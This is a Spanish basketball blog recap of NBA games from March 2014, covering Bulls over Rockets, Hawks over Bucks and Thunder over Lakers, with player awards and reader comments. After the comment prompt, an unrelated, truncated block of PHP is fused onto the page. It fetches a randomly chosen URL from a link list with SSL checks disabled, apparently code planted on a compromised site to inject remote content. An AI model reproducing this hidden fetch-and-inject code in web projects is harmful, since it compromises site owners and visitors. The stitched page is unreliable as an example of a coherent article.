La Crónica: La lección con sangre entra

14 de March de 2014 por txusma

Llegaban los Rockets al United Center como uno de los grandes equipos anotadores de la liga y como uno a los que seguir durante la próxima postemporada. Los de Houston habían mostrado su mejor momento de forma en las últimas semanas. Los Bulls, cuartos del devaluado Este, trataban de recuperar un cartel que pierden inexorablemente cada año con la baja de Rose y que suelen ganarse por estas fechas amargándoles la vida a sus rivales todo lo posible. Seguramente no hay simulacro de playoffs más perfecto que puedan experimentar los Rockets por anticipado. Los mejores elementos defensivos de los Bulls son un espejo de las mejores armas de los Rockets. Jimmy Butler sobre Harden y Noah sobre Howard. Un equipo preparado para hacer pagar caro cada error rival. Pronto se vio que la visita no iba a ser agradable. El fragor de la batalla quedaba ilustrado con un golpe en el rostro que mandó a Dunleavy, sangrando a chorros, al vestuario. Luego volvería para desgracia del rival. Los Rockets no se encontraban a si mismos y ni Harden ni Howard lograban despegarse de sus sombras. Sólo Jeremy Lin encontraba algún agujero. La tormenta final les alcanzó en el tercero, cuando volvió Dunleavy desenfrenado culminaba con acierto cada ataque de los Bulls. El ánimo rival terminó de romperse y sólo vimos un carrusel de pérdidas y fallos a canasta. El último cuarto prácticamente sobró (87-111). La pregunta que surge es: ¿Están los Bulls en condiciones de inquietar realmente a los cocos de su conferencia? Pronto lo verificaremos.

Los otros dos duelos del jueves eran mucho menos apasionantes. Los Hawks aprovecharon su enfrentamiento contra los Bucks para sumar, aunque para ello tuvieron que tirar de un Korver majestuoso en el último cuarto cuando Ersan y Brandon Knight apretaron a tope el acelerador (97-102). Por su parte los Thunder se cobraron cumplida revancha por la anterior derrota ante Lakers. Los 131 puntos inflingidos son mucho más acordes a la filosofía D’Antoni y a la diferencia sobre el papel entre ambos ahora mismo (102-131). 

PREMIOS

MVP: Serge Ibaka, Kevin Durant y Russell Westbrook no tuvieron que sudar mucho para imponerse a los Lakers. Sobretodo el último, que anotó 29 puntos y repartió 9 asistencias en apenas 23 minutos. El español casi consigue un triple doble (15 puntos, 13 rebotes y 7 tapones).

Rookie: Ryan Kelly fue de lo mejor de los Lakers anoche. Acabó con 12 puntos, 4 rebotes, 6 asistencias y 2 tapones. Por su parte, Dennis Schroder jugó uno de los mejores partidos del año al anotar 8 puntos, repartir 5 asistencias y no perder ningún balón.

Sorpresa: Ni la sangre pudo detener a Mike Dunleavy que acabó con 21 puntos y 7 rebotes.

Decepción: A todos los Rockets se les atragantó la defensa y la energía de Bulls pero quienes más los sufrieron fueron James Harden (8 puntos y 5 pérdidas) y sobretodo Chandler Parsons que se quedó en 3 puntos tras fallas 10 de sus 11 intentos a canasta.

Esfuerzo en vano: Ersan Ilyasova fue el mejor de los Bucks, que tampoco quiere decir mucho… Acabó con 22 puntos, 10 rebotes, 3 asistencias y 2 robos.

Imágenes | AP Photos / Getty Images

Comenta

7 comentarios a esta entrada

  1. Lucho dice:
    #1

    Rose no llega para los PO?

      Citar

  2. Nacho dice:
    #2

    Con todos los respetos para Raptors, Bobcats, Wizards y quien les acompañe, en Indiana y en Miami deben de estar rezando por una serie entre Nets y Bulls y que en segunda ronda les toque el ganador al otro.

      Citar

  3. Jose Luis dice:
    #3

    Pues tiene pinta de que quedan 4/5 y les tocaría al 1er puesto…

    Lo suyo sería que quedase 3º uno de los dos, así habría unas bonitas semis de conferencia.

      Citar

  4. Nacho dice:
    #4

    Jose Luis:
    Pues tiene pinta de que quedan 4/5 y les tocaría al 1er puesto…

    Lo suyo sería que quedase 3º uno de los dos, así habría unas bonitas semis de conferencia.

    Chicago está a un partido de los Raptors

      Citar

  5. HisRoyalAirness dice:
    #5

    Lucho:
    Rose no llega para los PO?

    Yo ya dije cuando se lesionó que llegar llegaba de sobra pero que no le ponen fecha para que no les pase lo del año pasado. Luego ya veran si les compensa arriesgar

      Citar

  6. Esteban dice:
    #6

    si Nets y Bulls, son equipos mas hechos que Raptors y Wizards, con menos futuro es cierto, pero con un presente muy superior pensando en PO

    por mkas bueno que pueden ser wall, beal, lowry, derozan etc, en PO prefiero a ellos dos antes que a JoJo y a The True, y que a Tom

      Citar

  7. Lucho dice:
    #7

    OK gracias His

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>